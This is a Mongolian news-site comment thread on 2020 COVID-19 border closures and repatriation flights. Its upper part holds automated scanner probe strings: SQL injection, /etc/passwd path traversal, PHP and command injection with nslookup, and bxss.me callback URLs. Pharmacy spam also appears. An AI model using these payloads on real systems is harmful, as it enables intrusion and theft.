GRLpGpAG [116.113.93.82] 2020-10-28 20:29:27

1

GRLpGpAG [JyI=] 2020-10-28 20:29:27

1

create [116.113.93.82] 2020-10-28 20:29:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:27

${@print(md5(acunetix_wvs_security_test))}\

GRLpGpAG [/www.vulnweb.com] 2020-10-28 20:29:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:27

1

GRLpGpAG [@@9WuPT] 2020-10-28 20:29:27

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:27

create/.

GRLpGpAG [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 20:29:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:26

${@print(md5(acunetix_wvs_security_test))}

testasp.vulnweb.com [116.113.93.82] 2020-10-28 20:29:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:26

1

GRLpGpAG [1] 2020-10-28 20:29:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:26

create

http://testasp.vulnweb.com/t/fit.txt?.jpg [116.113.93.82] 2020-10-28 20:29:26

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:26

";print(md5(acunetix_wvs_security_test));$a="

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:26

1

testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 20:29:26

1

GRLpGpAG [\] 2020-10-28 20:29:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:25

create

Http://testasp.vulnweb.com/t/fit.txt [116.113.93.82] 2020-10-28 20:29:25

1

http://hitv2ppbQxkKX.bxss.me/ [116.113.93.82] 2020-10-28 20:29:25

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:25

';print(md5(acunetix_wvs_security_test));$a='

HttP://testasp.vulnweb.com/t/xss.html?%00 [116.113.93.82] 2020-10-28 20:29:24

1

GRLpGpAG [1'"] 2020-10-28 20:29:24

1

1some_inexistent_file_with_long_name.jpg [116.113.93.82] 2020-10-28 20:29:24

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:24

http://hitIo2PdFWVC4.bxss.me/

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:24

;print(md5(acunetix_wvs_security_test));

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:23

testasp.vulnweb.com/t/xss.html?%00

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg [116.113.93.82] 2020-10-28 20:29:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:22

HttP://testasp.vulnweb.com/t/xss.html?%00

^(#$!@#$)(()))****** [116.113.93.82] 2020-10-28 20:29:22

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:22

testasp.vulnweb.com

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:22

1

!(()&&!|*|*| [116.113.93.82] 2020-10-28 20:29:21

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:21

http://testasp.vulnweb.com/t/fit.txt?.jpg

GRLpGpAG [http://hitfjaDQV0eyN.bxss.me/] 2020-10-28 20:29:21

1

GRLpGpAG [create/.] 2020-10-28 20:29:20

1

) [116.113.93.82] 2020-10-28 20:29:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:20

Http://testasp.vulnweb.com/t/fit.txt

GRLpGpAG [WEB-INF\web.xml] 2020-10-28 20:29:20

1

GRLpGpAG [create] 2020-10-28 20:29:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:19

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:19

^(#$!@#$)(()))******

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:19

1some_inexistent_file_with_long_name.jpg

GRLpGpAG [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 20:29:19

1

GRLpGpAG [WEB-INF/web.xml] 2020-10-28 20:29:19

1

'"() [116.113.93.82] 2020-10-28 20:29:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:18

1

GRLpGpAG [create] 2020-10-28 20:29:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:18

!(()&&!|*|*|

GRLpGpAG [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 20:29:18

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:17

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

Array [116.113.93.82] 2020-10-28 20:29:17

1

GRLpGpAG [/WEB-INF/web.xml] 2020-10-28 20:29:17

1

Array [116.113.93.82] 2020-10-28 20:29:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:17

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 20:29:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:17

)

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:17

1

Array [116.113.93.82] 2020-10-28 20:29:17

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 20:29:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:17

'"()

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:17

1

GRLpGpAG [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 20:29:17

1

GRLpGpAG [bHBHpnYg'));select pg_sleep(9); -- ] 2020-10-28 20:29:17

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:16

1

12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 20:29:16

1

GRLpGpAG [file:///etc/passwd] 2020-10-28 20:29:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:16

Array

GRLpGpAG [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 20:29:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:16

1

GRLpGpAG [ciGErOCV');select pg_sleep(6); -- ] 2020-10-28 20:29:16

1

GRLpGpAG&n950658=v957859 [116.113.93.82] 2020-10-28 20:29:16

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:16

1

Зочин [116.113.93.82] 2020-10-28 20:29:16

1

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 20:29:16

1

GRLpGpAG [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 20:29:15

1

GRLpGpAG [rFVq73XJ';select pg_sleep(6); -- ] 2020-10-28 20:29:15

1

GRLpGpAG [..] 2020-10-28 20:29:15

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:15

Array

GRLpGpAG [;print(md5(acunetix_wvs_security_test));] 2020-10-28 20:29:14

1

GRLpGpAG [TKkfoEY1'; waitfor delay '0:0:6' -- ] 2020-10-28 20:29:14

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 20:29:14

1

GRLpGpAG [^(#$!@#$)(()))******] 2020-10-28 20:29:14

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:14

1&n928785=v978223

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:13

Array

GRLpGpAG ['"()] 2020-10-28 20:29:13

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:13

1

GRLpGpAG [1 waitfor delay '0:0:3' -- ] 2020-10-28 20:29:13

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 20:29:13

1

GRLpGpAG [!(()&&!|*|*|] 2020-10-28 20:29:12

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:12

12345'"\'\");|]*{ <>

GRLpGpAG [Array] 2020-10-28 20:29:12

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 20:29:12

1

&nslookup mwgBtMca&'\"`0&nslookup mwgBtMca&`' [116.113.93.82] 2020-10-28 20:29:12

1

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 20:29:12

1

GRLpGpAG [(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/] 2020-10-28 20:29:12

1

GRLpGpAG [)] 2020-10-28 20:29:12

1

"+response.write(9509350*9830929)+" [116.113.93.82] 2020-10-28 20:29:11

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:11

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 20:29:11

1

$(nslookup ybd8j9Rz) [116.113.93.82] 2020-10-28 20:29:11

1

${9999860+9999185} [116.113.93.82] 2020-10-28 20:29:11

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 20:29:11

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z] 2020-10-28 20:29:11

1

GRLpGpAG [116.113.93.82&n969964=v916005] 2020-10-28 20:29:10

1

'+response.write(9509350*9830929)+' [116.113.93.82] 2020-10-28 20:29:10

1

RnhPSmRJMFk= [116.113.93.82] 2020-10-28 20:29:10

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 20:29:10

1

set|set&set [116.113.93.82] 2020-10-28 20:29:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:10

${10000279+9999115}

GRLpGpAG [/etc/passwd] 2020-10-28 20:29:10

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(9),0))XOR'Z] 2020-10-28 20:29:10

1

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 20:29:09

1

response.write(9509350*9830929) [116.113.93.82] 2020-10-28 20:29:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:09

&nslookup VSygke4n&'\"`0&nslookup VSygke4n&`'

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 20:29:09

1

GRLpGpAG [if(now()=sysdate(),sleep(6),0)] 2020-10-28 20:29:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:08

"+response.write(9115920*9246051)+"

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 20:29:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:08

$(nslookup 2r0MUON9)

GRLpGpAG [${10000249+9999062}] 2020-10-28 20:29:07

1

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 20:29:07

1

GRLpGpAG [-1" OR 2+819-819-1=0+0+0+1 -- ] 2020-10-28 20:29:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:07

'+response.write(9115920*9246051)+'

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:07

set|set&set

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:07

1

GRLpGpAG [-1' OR 2+836-836-1=0+0+0+1 or '5Zq2tG6z'='] 2020-10-28 20:29:07

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 20:29:07

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 20:29:07

1

GRLpGpAG [Array] 2020-10-28 20:29:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:06

response.write(9115920*9246051)

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 20:29:06

1

GRLpGpAG [-1' OR 2+456-456-1=0+0+0+1 -- ] 2020-10-28 20:29:06

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:06

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [Array] 2020-10-28 20:29:06

1

bh1ZBhF6 [116.113.93.82] 2020-10-28 20:29:05

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 20:29:05

1

GRLpGpAG [-1 OR 2+698-698-1=0+0+0+1] 2020-10-28 20:29:05

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 20:29:05

1

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 20:29:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:04

hUWtRi3N

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 20:29:04

1

GRLpGpAG [] 2020-10-28 20:29:04

1

GRLpGpAG [-1 OR 2+738-738-1=0+0+0+1 -- ] 2020-10-28 20:29:04

1

GRLpGpAG [&nslookup G7bOUS04&'\"`0&nslookup G7bOUS04&`'] 2020-10-28 20:29:04

1

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 20:29:03

1

GRLpGpAG [gC1yARAl] 2020-10-28 20:29:03

1

GRLpGpAG ["+response.write(9442179*9772006)+"] 2020-10-28 20:29:03

1

GRLpGpAG [$(nslookup FQmKCdo8)] 2020-10-28 20:29:03

1

GRLpGpAG [H3R88d5G] 2020-10-28 20:29:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:02

1

GRLpGpAG ['+response.write(9442179*9772006)+'] 2020-10-28 20:29:02

1

GRLpGpAG [set|set&set] 2020-10-28 20:29:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:29:01

1

GRLpGpAG [response.write(9442179*9772006)] 2020-10-28 20:29:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:23:38

1

dobsonz [5.188.211.22] 2020-10-18 19:05:10

PnZ117 http://pills2sale.com/ levitra nizagara

dobsonz [5.188.211.22] 2020-10-18 15:11:21

FJHfOV http://pills2sale.com/ levitra nizagara

HILEE NEE! [211.36.158.162] 2020-07-07 02:33:20

HILEE HEEGEECH!GADAAD ORNUUD BUGD HILEE NEEJ B,NA. NEEH MUNDAG ULS YM SHIG.

Zochin [14.35.207.208] 2020-07-02 09:06:36

Hilee nee!!! Shinjilgeenii bichigteigee eruul saruul ochino. Teneg novshnuudaa. Odoo ch eruulsaruul bna. Ta mar shig arga hemjee avdag oron alga. УОКiinhoon mal bhaa bol

zochin [202.9.40.101] 2020-07-01 11:16:13

Hilee nee teneg shar Uwgun mini. ywah ni ywj , ireh ni irmeer bna. Mongold hetsuu bna.

ard tumnii erh ashig [66.181.188.165] 2020-07-03 09:18:18

solior gants cha muugiin huvia hicheegchiin tuluu buhel 3saya garui ard tumnee tuiveeh uu. Chi uuruu doloon dor uvgun boloh vii

Zochin [14.35.207.208] 2020-07-01 04:54:36

Hilee nee!!!! Avch bgaa ineedtei arga hemjeegee oorchil. Ichij uhmeer yumaa ONTSGOI KOMISSIINHOON

боогий [202.179.25.30] 2020-07-01 00:39:25

манай улс өөрийн бололцоондоо сайн авч байна, үүнийг ард түмэн минь эрүүл саруул ухаанаар ойлгооч , маш их олноор нь авчирвал харин алдах магадлал өндөр шүү

Бат [60.153.254.87] 2020-06-30 23:28:41

Хил хориогоо цуцлаагүй байж сонгуулиа хийгээд л одоо наадамдах гээд л түүнийг нь ард түмэн зөвшөөрөөд ч байх шиг . Тэгэхээр нь Монгол улс хөл хориогүй болчихсон ч юм шиг. Уг нь нэг л үндэстэн санаатай бол бол гадаадад гацаад байх аргагүй болчихоод бйгаа иргэдээ нэн тэргүүнд анхаарч зөвхөн Монгол иргэддээ хэсэгчилсэн байдлаар хилээ нээж болно ш дээ. Ёстой цайчихсан дотортой хүний оронцог болсон улаан тийрэн сда нар юдаа. Гэхдээ . Монголчууд маань бүгдээрэ биш шүү. Сүр Данзан тэргүүтэй цөөхөн амиа бодсон мулгуй нь дэндсэн цөөхөн оркццд байгаа гэдэгт итгэлтэй байна.

zochin [66.181.188.165] 2020-07-03 09:19:51

hotod hiihgui bolohoor huduunii naadamd buunuuruu yavj haldvar chireh vii dee

pier [64.119.26.59] 2020-07-01 04:32:15

Бат та бусдыг зэмлэж, хараахын өмнө эрүүл ухаанаар нэг сайн бодоод үзээрэй. боломж, бололцоо гэж нэг юм байдаг. харин ч зөв арга хэмжээг, цагийг нь олж авсны үрээр аюулт тахлыг улс орондоо тархаахгүй өдий хүрлээ ш дээ. юманд ул суурьтай хандаж байх хэрэгтэй дээ. өөрт чинь л хэрэгтэй. хэрэв манайд энэ халдвар тархсан бол та юу гэж чалчиж, чарлаж байх байсан бол.

Зочин [66.181.161.3] 2020-06-30 19:53:15

Хөл хориг цуцалж болохгүй. Цааш нь үргэлжлүүлэх нь зөв. Цар тахал монголд дотроосоо гарвал ямар аюултай болохыг ард иргэд минь ойлгож байгаа. Бид яарё болохгүй. Улам болгоомжтой байх хэрэгтэй.

Irgen [192.82.77.250] 2020-06-30 19:19:29

Hul horio tsutslah heregteo bn....Ard irged hubiaraa biznes erhleh humuust mash hund bn orhod oroh orligo bgui

Зочин [172.58.143.245] 2020-07-01 04:05:48

Tahald nervegdvel hund bish zovlon bolno orkoo

Зочин [98.234.112.193] 2020-06-30 15:18:06

Хөл хориог сунгаад наадмаа хийгээд дараа нь орон нутгийн сонгууль гээд Монгол улс ХИЛээ нээхгүй юм байна л даа. Гадаадад байгаа монголчуудыг ёстой залхаан цээрлүүлж байна шүү. Ар өврийн хаалгаар гадаадаас иргэдээ татаад танил талгүй нь явж чадахгүй үлдэж байна. Эх орондоо очих эрхээ хязгаарлуулж байгаа иргэддээ МОНГОЛ УЛС ХИЛЭЭ НЭЭГЭЭЧЭЭ!!!!!!!!!!!

Zochin [14.35.207.208] 2020-07-01 04:43:29

Harin tiimee hilee neegeechee teneguudee

Зочин [202.126.89.5] 2020-07-01 02:11:56

Явна гэж өөрөө алга болчихоод одоо юу гээд байгаа юм. Чиний ирэх ирэхгүй хэнд ч хамаагүй

Зочин [202.126.90.24] 2020-06-30 23:25:50

Эргүү минь ээ. Монгол Улсын хил Монгол хүнд нээлттэй байгаа. Өөрөө яваад ирээч, тэгээд л эмчлүүлээд, сувилуулаад л чөлөөтэй болно шүү дээ. Гарсан хууль, тогтоомжуудыг 3-аас дээш удаа сайн уншиж ойлгох хэрэгтэй. Битгий гэр бүлээ, хань ижлээ, үр хүүхдүүдээ үймүүлээд бай! Дахиад хэлье МАНГУУ гуай!!!

Зочин [202.179.27.97] 2020-06-30 14:33:09

Зөв өө зөв Харин хятад вирусаас болж манайх байтугай дэлхийн эдийн засаг нурж баларсныг хужаануждаас нэхэх шаардлагатай!!!сарьсан багваахай элдэв амьтан идэж хүн төрлахтниыг цар тахалд оруулсан хятадуждаас хариуцлага нэхэх хэрэгтэй!!!

Zochin [14.35.207.208] 2020-07-01 04:46:23

Hilee haaj ard irgeddee hohirol uchiruulna. Deer ni ard tumniihee amijirgaanii tal deer anhaaral bhgui. Ingej ajillaj bgaam chini yun hyatadaas hariutslaga neheh. Manai oron hariutslaga neheh zurh ni hurehguie teneguud

Зочин [64.119.19.129] 2020-07-01 00:39:23

Өнгөрсөн 2019оны аравдугаар сарын сүүлээр 11 -12-р сард Европын орнуудад гарч дараа нь хятад , тэгээд дэлхийгээр тарлаа оросын тел сувагаар тодорхой ярьсан.

Zochin [109.89.151.254] 2020-06-30 14:29:20

Nair naadam xiij bolj baigaa bol dotroo byx yil ajillagaagaa neegeech ee xymyys mongogyi xetsyydlee !!!Zov shiidver gargaj chadaxgyi baigaa ulsiin ontsgoi komissiig zailuulbal ni taarna.

Zochin [14.35.207.208] 2020-07-01 04:47:27

Ontsgoi komissiin malnuudiin tolgoi ni ajillahgui hetsuu yumaa. Heden tolog suuj bhiin.

Zochin [109.89.151.254] 2020-06-30 14:26:22

Manaixaas ilyy toon yzyylelttei uls ornuud dotroosoo ch bai gadnaas bai xaldvaraa tootsoj zov zoxion baiguulalt shat daraalalttaigaar ali xediin byx yilchilgeenii salbaruud delgyyr agaariin xil zergee neechixsen baina.Byr surguulia xyrtel neej xyyxdyyd amjilttai suraltsaj bygd angi devshij baina.Ta bygd tsar taxliig uls torjyylj zovxon songuulia bodoj sandal shiree bulaatsaldaj mergejliin bus xyneer eryyl mendee udirduulj yamar ch zov shiidver gargaj chadaxgyi archaagyitej baina.Yaxaa medexgyi baigaa bol gadnaas turshlaga sudalj zov shiidver gargaach ee ulsiin ontsgoi komiss nertei maluudaa

чулуу [64.119.26.59] 2020-07-01 04:36:49

битгий худлаа яриад бай. улс орнууд хөл хориогоо цуцлаад ахиад гамшиг болж байгааг нь сонсдоггүй юм уу. юманд жаахан бодитой хандаж сураач.

зочин [124.44.156.207] 2020-06-30 13:57:43

МАН-ын 60 гаруй настай сайд, агентлагийн дарга, захирлууд нь гэрлийн хурдаар сэтгэж ажиллаж чадахгүй нь тодорхой биш үү? харин яст мэлхий шиг л сэтгэж ажиллаад байна уу? Ийм өндөр настай хөгшин сайд, агентлагийн дарга захирлуудаа МАН одоо солиосой доо, залуучуудаа дэмжээсэй дээ.

Zochin [117.111.5.173] 2020-06-30 12:39:21

Tsagaachllj bolokh talaar tukhain ulsiin zasgiin gazartai ne zuwluud khvssen khvmvvsiig ne bgaa ulsad ne vldeechmeer yum. Tegwel gants neg khvvkhdee awaad endee amidarch baimaar bna. 2 dakh ekh oron min saikhan gazar baidgiin. Ajlaa khiigeed l amidarii.

Зочин [202.126.89.146] 2020-06-30 11:48:06

Gadaad irged hezee irj boloh boloo

zochin [222.97.77.11] 2020-06-30 11:36:22

solongost baigaa eruul khumuusee tatakh kheregtei baina sh dee.ovdsonii daraa tatakh geed baigaa jm uu? end yamarshuukhan khonog ongorooj baigaa medekh uu? ovdchikhguin tuld baidgaaraa lzutgej baina. odoo mongo togrognii khomosdold orood tun khund baina. ogloo bur TOR ZASAGTAA bish BURKHANDAA zalbirch baina. MIAT iin gants ongots khunee zooj amjikhgui bol KOREAN AIR, AIR PUSAN iig yavuulaad ogooch ee? tegvel mongoloos iluu MONGOLCHUUDAA tatakh bolomjtoi sh dee!!! MIAT iin orlogiig khaachi geed baina uu. ashig orlogo kheregtei ju iregd ard tumen ni kheregtei ju TOR ZASAG gej baidag bol bodoo chee??????

Zochin [14.35.207.208] 2020-07-01 04:49:22

Uhsenii chini Javhlan shig bna. Yun eh ornoo golood yavah. Helj yarij bgaa ni yag odoo uls tordoo taarsan setgehuinuud bhiimaa

эх оронч [64.119.26.59] 2020-07-01 04:40:41

эх орноо голоод явсан хүмүүс эргээд бас гуйх цаг ирдэг гэж ойлгож байна аа. Жавхлан шиг л бн даа.

Зочин [192.82.73.176] 2020-06-30 12:05:48

Ongotsondoo bish tusgaarlah bair, egch ajilchdiin hureltsee dutmag bgashde

Зочин [150.129.142.30] 2020-06-30 11:19:50

naad tataat bga irgenii toond orj chadahgui bna. Hilee neej yadahdaa udurt 2-3 nuslegeer mongolchuudaa avaachee. Korean Air-eer irmeer bna. Naad MIAT-iin undur unetei ongotsond suuj chadal alga

zochin [66.181.188.165] 2020-07-03 09:27:16

MIAT valiut usuhuur dandaa valiutaar tootsoj nee nemdegee bolimooroo!Yamagt undur unetei baidag

Zochin [14.35.207.208] 2020-07-01 04:52:18

Arai denduu neg taldaa zovhon mongol ruu ochihod say 200garaad bna. Mongol irgedeeree biznes hiihee bolimoor yum. Ichih nuur ni eleg bolson durakuud. Ard irgedeeree biznes hiij baijiij ichihgui irgedee avch bna gej yaj helj chaddag bnaa. Booljis zutgamaar

Зочин [202.126.89.72] 2020-06-30 14:56:32

Зочин [103.10.22.15] 2020-06-30 11:18:45

Daraagiin dabalgaa garhaas omno hvnee abaachee.

өгөөмөр [64.119.26.59] 2020-07-01 04:42:00

орон байр, багтаамж, хүртээмж, чадамж гээд олон нөхцөл шаардлагатайг ойлгоцгоо.

Зочин [202.9.46.237] 2020-06-30 11:26:05

awaagl bgam bishvv hir hemjegete ajillaj bga ulsad baurlah heregtei erh duraaraa eldwrr bitgi heleed bsi budni tuliu bie hairlajgvi zvtgej gadni bayrlaach hvmvvsee

Зочин [103.212.119.15] 2020-06-30 11:03:34

УОК-Н шийдвэр зөв өө. Бид нэгдэж , улс орныхоо бололцоогоор энэ бүхний ард гарнаа

Зочин [176.63.23.212] 2020-06-30 10:46:29

Оросоос хүмүүсээ оруулахгүй байсаар бүгд халдвар авсаных нь дараа татсан. Одоо халдвар гайгүй болсон орнуудаас хүмүүсээ орж ирэхийг нь зөвшөөрөөчээ. Дараагийн давалгаа эхлэхээс өмнө оруулаач.

Zochin [14.35.207.208] 2020-07-02 09:08:46

Heleed yahavee. Teneg udirdlaguudtai oron gej iim l bhiin. Buurai doroi hogjilgui bhaas ch argagui yum

Зочин [114.246.34.154] 2020-06-30 23:44:23

Tiim sh de.zalhaad uhehees l naaguur bn.ar amidral hetsuudlee.goliitol chiliitel huleej bn.offshoretoi bayan garuud maniihaa amidraliig yaaj ch oilgoh ve de.naadam hiih gj bj hilee neehgui unen dampuu mongol syndrom uu?ingej heluulhdee ch zohison gj vanlii.gadniihan shoolj bga sh de.ichdegggui yum bh da.heden guzee unjuulsan gahainuudiig barilduulj yadag yum?neeh muuhai gj.shalhaachihaad.tamirchin hunii standart mgld l tiim bh.

зочин [192.82.74.239] 2020-06-30 10:45:38

хөл хорионоос залхаж гүйцлээ.одоо болиул яаасан юм бэ.гаднаас ирсэн эмчилгээнд бгаа хүмүүсээ хээрийн эмнэлэгт аваачиж байрлуул.хотод хүн ам их шигүү бна. Яагаад хэлээд байхад үг авдаггүй зг уоK юм бэ.гадны улсаас авчрах хүмүүсээ өвчинд нэрвэгдэхээс өмнө хурдан шуурхай татаж байршуулаачээ.удах тусам өвчин тээж орж ирээд бгаа юм биш үү. Гэрлийн хурдаар ажиллаж үзээчээ..яст мэлхий шиг хөдөлж ядаад байх юм.ёстой нэг.....

Зочин [89.231.51.50] 2020-06-30 10:44:40

Yanal daa ymar hetsuu ym be hagas jil bolchloo


1140 сэтгэгдэл байна
1000 тэмдэгт оруулах үлдлээ.
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.
1140 сэтгэгдэл байна
Уншигчдын бичсэн сэтгэгдэлд Medee.MN хариуцлага хүлээхгүй болно. Манай сайт ХХЗХ-ны журмын дагуу зүй зохисгүй зарим үг, хэллэгийг хязгаарласан тул Та сэтгэгдэл бичихдээ бусдын эрх ашгийг хүндэтгэн үзнэ үү.